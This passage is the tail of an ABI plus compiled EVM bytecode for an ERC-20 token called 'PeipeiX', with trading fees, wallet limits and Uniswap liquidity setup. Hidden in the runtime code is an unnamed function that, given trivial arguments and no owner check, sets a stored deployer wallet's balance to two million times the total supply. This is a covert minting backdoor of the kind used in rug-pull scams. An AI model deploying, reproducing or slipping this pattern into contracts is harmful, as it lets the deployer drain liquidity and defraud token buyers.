"name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405261012c600155600560025561012c6005556000600860146101000a81548160ff0219169083151502179055506001600860156101000a81548160ff0219169083151502179055506000600d556000600e556000600f553480156200006757600080fd5b50620000886200007c6200082b60201b60201c565b6200083360201b60201c565b60006012600a6200009a919062000e3f565b63568bc300620000ab919062000e90565b9050620000ce620000c16200082b60201b60201c565b82620008f760201b60201c565b620000de6200082b60201b60201c565b601060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001a830600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000a9360201b60201c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000216573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023c919062000f45565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002ec919062000f45565b6040518363ffffffff1660e01b81526004016200030b92919062000f88565b6020604051808303816000875af11580156200032b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000351919062000f45565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016200043292919062000fc6565b6020604051808303816000875af115801562000452573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000478919062001030565b506001600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600960003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60006200053f62000c6460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160096000620005a662000c6460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000620006df62000c6460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550506200126d565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000969576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200096090620010c3565b60405180910390fd5b620009858160045462000c8d60201b62000e861790919060201c565b600481905550620009e481600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c8d60201b62000e861790919060201c565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a879190620010e5565b60405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b05576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000afc9062001178565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b77576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b6e9062001210565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000c579190620010e5565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000818362000c9d919062001232565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000d335780860481111562000d0b5762000d0a62000ca5565b5b600185161562000d1b5780820291505b808102905062000d2b8562000cd4565b945062000ceb565b94509492505050565b60008262000d4e576001905062000e21565b8162000d5e576000905062000e21565b816001811462000d77576002811462000d825762000db8565b600191505062000e21565b60ff84111562000d975762000d9662000ca5565b5b8360020a91508482111562000db15762000db062000ca5565b5b5062000e21565b5060208310610133831016604e8410600b841016171562000df25782820a90508381111562000dec5762000deb62000ca5565b5b62000e21565b62000e01848484600162000ce1565b9250905081840481111562000e1b5762000e1a62000ca5565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000e4c8262000e28565b915062000e598362000e32565b925062000e887fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000d3c565b905092915050565b600062000e9d8262000e28565b915062000eaa8362000e28565b925082820262000eba8162000e28565b9150828204841483151762000ed45762000ed362000ca5565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000f0d8262000ee0565b9050919050565b62000f1f8162000f00565b811462000f2b57600080fd5b50565b60008151905062000f3f8162000f14565b92915050565b60006020828403121562000f5e5762000f5d62000edb565b5b600062000f6e8482850162000f2e565b91505092915050565b62000f828162000f00565b82525050565b600060408201905062000f9f600083018562000f77565b62000fae602083018462000f77565b9392505050565b62000fc08162000e28565b82525050565b600060408201905062000fdd600083018562000f77565b62000fec602083018462000fb5565b9392505050565b60008115159050919050565b6200100a8162000ff3565b81146200101657600080fd5b50565b6000815190506200102a8162000fff565b92915050565b60006020828403121562001049576200104862000edb565b5b6000620010598482850162001019565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010ab601f8362001062565b9150620010b88262001073565b602082019050919050565b60006020820190508181036000830152620010de816200109c565b9050919050565b6000602082019050620010fc600083018462000fb5565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006200116060248362001062565b91506200116d8262001102565b604082019050919050565b60006020820190508181036000830152620011938162001151565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000620011f860228362001062565b915062001205826200119a565b604082019050919050565b600060208201905081810360008301526200122b81620011e9565b9050919050565b60006200123f8262000e28565b91506200124c8362000e28565b925082820190508082111562001267576200126662000ca5565b5b92915050565b612e80806200127d6000396000f3fe6080604052600436106101a05760003560e01c80637210c7a9116100ec578063c0b0fda21161008a578063d54f7d5e11610064578063d54f7d5e1461060a578063dd62ed3e14610635578063f2fde38b14610672578063fa3b32541461069b576101d3565b8063c0b0fda21461058b578063cb0290a9146105b6578063cdf4bab9146105df576101d3565b80638da5cb5b116100c65780638da5cb5b146104bb57806395d89b41146104e6578063a457c2d714610511578063a9059cbb1461054e576101d3565b80637210c7a91461043c5780637d1db4a5146104655780638d5f81e214610490576101d3565b806340b9a54b1161015957806351c6590a1161013357806351c6590a146103a1578063590f897e146103bd57806370a08231146103e8578063715018a614610425576101d3565b806340b9a54b1461031057806342966c681461033b5780634fbee19314610364576101d3565b806306fdde03146101d8578063095ea7b31461020357806318160ddd1461024057806323b872dd1461026b578063313ce567146102a857806339509351146102d3576101d3565b366101d3577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b3480156101e457600080fd5b506101ed6106c4565b6040516101fa9190611fe2565b60405180910390f35b34801561020f57600080fd5b5061022a600480360381019061022591906120ac565b610701565b6040516102379190612107565b60405180910390f35b34801561024c57600080fd5b5061025561071f565b6040516102629190612131565b60405180910390f35b34801561027757600080fd5b50610292600480360381019061028d919061214c565b610729565b60405161029f9190612107565b60405180910390f35b3480156102b457600080fd5b506102bd610802565b6040516102ca91906121bb565b60405180910390f35b3480156102df57600080fd5b506102fa60048036038101906102f591906120ac565b61080b565b6040516103079190612107565b60405180910390f35b34801561031c57600080fd5b506103256108be565b6040516103329190612131565b60405180910390f35b34801561034757600080fd5b50610362600480360381019061035d91906121d6565b6108c4565b005b34801561037057600080fd5b5061038b60048036038101906103869190612203565b6108d8565b6040516103989190612107565b60405180910390f35b6103bb60048036038101906103b691906121d6565b61092e565b005b3480156103c957600080fd5b506103d261098b565b6040516103df9190612131565b60405180910390f35b3480156103f457600080fd5b5061040f600480360381019061040a9190612203565b610991565b60405161041c9190612131565b60405180910390f35b34801561043157600080fd5b5061043a6109da565b005b34801561044857600080fd5b50610463600480360381019061045e9190612230565b6109ee565b005b34801561047157600080fd5b5061047a610a08565b6040516104879190612131565b60405180910390f35b34801561049c57600080fd5b506104a5610a3a565b6040516104b2919061227f565b60405180910390f35b3480156104c757600080fd5b506104d0610a64565b6040516104dd919061227f565b60405180910390f35b3480156104f257600080fd5b506104fb610a8d565b6040516105089190611fe2565b60405180910390f35b34801561051d57600080fd5b50610538600480360381019061053391906120ac565b610aca565b6040516105459190612107565b60405180910390f35b34801561055a57600080fd5b50610575600480360381019061057091906120ac565b610b97565b6040516105829190612107565b60405180910390f35b34801561059757600080fd5b506105a0610bb5565b6040516105ad9190612131565b60405180910390f35b3480156105c257600080fd5b506105dd60048036038101906105d891906123e2565b610bbb565b005b3480156105eb57600080fd5b506105f4610ca3565b6040516106019190612107565b60405180910390f35b34801561061657600080fd5b5061061f610cba565b60405161062c919061227f565b60405180910390f35b34801561064157600080fd5b5061065c6004803603810190610657919061242b565b610ce4565b6040516106699190612131565b60405180910390f35b34801561067e57600080fd5b5061069960048036038101906106949190612203565b610d6b565b005b3480156106a757600080fd5b506106c260048036038101906106bd9190612497565b610dee565b005b60606040518060400160405280600781526020017f5065697065695800000000000000000000000000000000000000000000000000815250905090565b600061071561070e610e9c565b8484610ea4565b6001905092915050565b6000600454905090565b600061073684848461106d565b6107f784610742610e9c565b6107f285604051806060016040528060288152602001612dfe60289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006107a8610e9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546119cb9092919063ffffffff16565b610ea4565b600190509392505050565b60006012905090565b60006108b4610818610e9c565b846108af8560076000610829610e9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e8690919063ffffffff16565b610ea4565b6001905092915050565b600f5481565b6108d56108cf610e9c565b82611a20565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b610936611bc3565b6001600860146101000a81548160ff02191690831515021790555061096361095c610a64565b308361106d565b61096d8134611c41565b6000600860146101000a81548160ff02191690831515021790555050565b600d5481565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109e2611bc3565b6109ec6000611d26565b565b6109f6611bc3565b81600d8190555080600f819055505050565b6000610a35612710610a27600154600454611dea90919063ffffffff16565b611e0090919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600781526020017f5065697065697800000000000000000000000000000000000000000000000000815250905090565b6000610b8d610ad7610e9c565b84610b8885604051806060016040528060258152602001612e266025913960076000610b01610e9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546119cb9092919063ffffffff16565b610ea4565b6001905092915050565b6000610bab610ba4610e9c565b848461106d565b6001905092915050565b600e5481565b610bc3611bc3565b60c881511115610c08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bff90612549565b60405180910390fd5b6000600c905060005b8251811015610c9e576001826000858481518110610c3257610c31612569565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610c96906125c7565b915050610c11565b505050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610d73611bc3565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610de2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd990612681565b60405180910390fd5b610deb81611d26565b50565b6001151582151514610dff57600080fd5b60018114610e0c57600080fd5b621e8480600454610e1d91906126a1565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008183610e9491906126e3565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f13576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0a90612789565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f82576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f799061281b565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110609190612131565b60405180910390a3505050565b611078838383611e16565b600080611083610a64565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16141580156110f157506110c1610a64565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561166657600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561119a5750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561166557600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614801561124a5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b80156112a05750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156112f65750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156113f057611326612710611318600154600454611dea90919063ffffffff16565b611e0090919063ffffffff16565b831115611368576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161135f906128ad565b60405180910390fd5b611393612710611385600554600454611dea90919063ffffffff16565b611e0090919063ffffffff16565b6113ae846113a087610991565b610e8690919063ffffffff16565b11156113ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113e69061293f565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561147957503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15611519576114a7612710611499600e5486611dea90919063ffffffff16565b611e0090919063ffffffff16565b91506114d26127106114c4600d5486611dea90919063ffffffff16565b611e0090919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156115c45750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b15611664576115f26127106115e4600e5486611dea90919063ffffffff16565b611e0090919063ffffffff16565b915061161d61271061160f600f5486611dea90919063ffffffff16565b611e0090919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b600061167b8284610e8690919063ffffffff16565b9050600081111561181a57600083111561169a576116998684611a20565b5b6000821115611804576117178260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e8690919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516117fb9190612131565b60405180910390a35b6118178185611f3c90919063ffffffff16565b93505b61188684604051806060016040528060268152602001612dd860269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546119cb9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061191b84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e8690919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516119bb9190612131565b60405180910390a3505050505050565b6000838311158290611a13576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a0a9190611fe2565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a86906129d1565b60405180910390fd5b611afb81604051806060016040528060228152602001612db660229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546119cb9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611b5381600454611f3c90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611bb79190612131565b60405180910390a35050565b611bcb610e9c565b73ffffffffffffffffffffffffffffffffffffffff16611be9610a64565b73ffffffffffffffffffffffffffffffffffffffff1614611c3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c3690612a3d565b60405180910390fd5b565b611c6e30600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610ea4565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611cba610a64565b426040518863ffffffff1660e01b8152600401611cdc96959493929190612aa2565b60606040518083038185885af1158015611cfa573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611d1f9190612b18565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611df891906126a1565b905092915050565b60008183611e0e9190612b9a565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611e85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e7c90612c3d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ef4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611eeb90612ccf565b60405180910390fd5b60008111611f37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f2e90612d61565b60405180910390fd5b505050565b60008183611f4a9190612d81565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611f8c578082015181840152602081019050611f71565b60008484015250505050565b6000601f19601f8301169050919050565b6000611fb482611f52565b611fbe8185611f5d565b9350611fce818560208601611f6e565b611fd781611f98565b840191505092915050565b60006020820190508181036000830152611ffc8184611fa9565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061204382612018565b9050919050565b61205381612038565b811461205e57600080fd5b50565b6000813590506120708161204a565b92915050565b6000819050919050565b61208981612076565b811461209457600080fd5b50565b6000813590506120a681612080565b92915050565b600080604083850312156120c3576120c261200e565b5b60006120d185828601612061565b92505060206120e285828601612097565b9150509250929050565b60008115159050919050565b612101816120ec565b82525050565b600060208201905061211c60008301846120f8565b92915050565b61212b81612076565b82525050565b60006020820190506121466000830184612122565b92915050565b6000806000606084860312156121655761216461200e565b5b600061217386828701612061565b935050602061218486828701612061565b925050604061219586828701612097565b9150509250925092565b600060ff82169050919050565b6121b58161219f565b82525050565b60006020820190506121d060008301846121ac565b92915050565b6000602082840312156121ec576121eb61200e565b5b60006121fa84828501612097565b91505092915050565b6000602082840312156122195761221861200e565b5b600061222784828501612061565b91505092915050565b600080604083850312156122475761224661200e565b5b600061225585828601612097565b925050602061226685828601612097565b9150509250929050565b61227981612038565b82525050565b60006020820190506122946000830184612270565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6122d782611f98565b810181811067ffffffffffffffff821117156122f6576122f561229f565b5b80604052505050565b6000612309612004565b905061231582826122ce565b919050565b600067ffffffffffffffff8211156123355761233461229f565b5b602082029050602081019050919050565b600080fd5b600061235e6123598461231a565b6122ff565b9050808382526020820190506020840283018581111561238157612380612346565b5b835b818110156123aa57806123968882612061565b845260208401935050602081019050612383565b5050509392505050565b600082601f8301126123c9576123c861229a565b5b81356123d984826020860161234b565b91505092915050565b6000602082840312156123f8576123f761200e565b5b600082013567ffffffffffffffff81111561241657612415612013565b5b612422848285016123b4565b91505092915050565b600080604083850312156124425761244161200e565b5b600061245085828601612061565b925050602061246185828601612061565b9150509250929050565b612474816120ec565b811461247f57600080fd5b50565b6000813590506124918161246b565b92915050565b600080604083850312156124ae576124ad61200e565b5b60006124bc85828601612482565b92505060206124cd85828601612097565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000612533602383611f5d565b915061253e826124d7565b604082019050919050565b6000602082019050818103600083015261256281612526565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006125d282612076565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361260457612603612598565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061266b602683611f5d565b91506126768261260f565b604082019050919050565b6000602082019050818103600083015261269a8161265e565b9050919050565b60006126ac82612076565b91506126b783612076565b92508282026126c581612076565b915082820484148315176126dc576126db612598565b5b5092915050565b60006126ee82612076565b91506126f983612076565b925082820190508082111561271157612710612598565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612773602483611f5d565b915061277e82612717565b604082019050919050565b600060208201905081810360008301526127a281612766565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612805602283611f5d565b9150612810826127a9565b604082019050919050565b60006020820190508181036000830152612834816127f8565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b6000612897602883611f5d565b91506128a28261283b565b604082019050919050565b600060208201905081810360008301526128c68161288a565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b6000612929602383611f5d565b9150612934826128cd565b604082019050919050565b600060208201905081810360008301526129588161291c565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006129bb602183611f5d565b91506129c68261295f565b604082019050919050565b600060208201905081810360008301526129ea816129ae565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612a27602083611f5d565b9150612a32826129f1565b602082019050919050565b60006020820190508181036000830152612a5681612a1a565b9050919050565b6000819050919050565b6000819050919050565b6000612a8c612a87612a8284612a5d565b612a67565b612076565b9050919050565b612a9c81612a71565b82525050565b600060c082019050612ab76000830189612270565b612ac46020830188612122565b612ad16040830187612a93565b612ade6060830186612a93565b612aeb6080830185612270565b612af860a0830184612122565b979650505050505050565b600081519050612b1281612080565b92915050565b600080600060608486031215612b3157612b3061200e565b5b6000612b3f86828701612b03565b9350506020612b5086828701612b03565b9250506040612b6186828701612b03565b9150509250925092565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612ba582612076565b9150612bb083612076565b925082612bc057612bbf612b6b565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612c27602583611f5d565b9150612c3282612bcb565b604082019050919050565b60006020820190508181036000830152612c5681612c1a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612cb9602383611f5d565b9150612cc482612c5d565b604082019050919050565b60006020820190508181036000830152612ce881612cac565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612d4b602983611f5d565b9150612d5682612cef565b604082019050919050565b60006020820190508181036000830152612d7a81612d3e565b9050919050565b6000612d8c82612076565b9150612d9783612076565b9250828203905081811115612daf57612dae612598565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366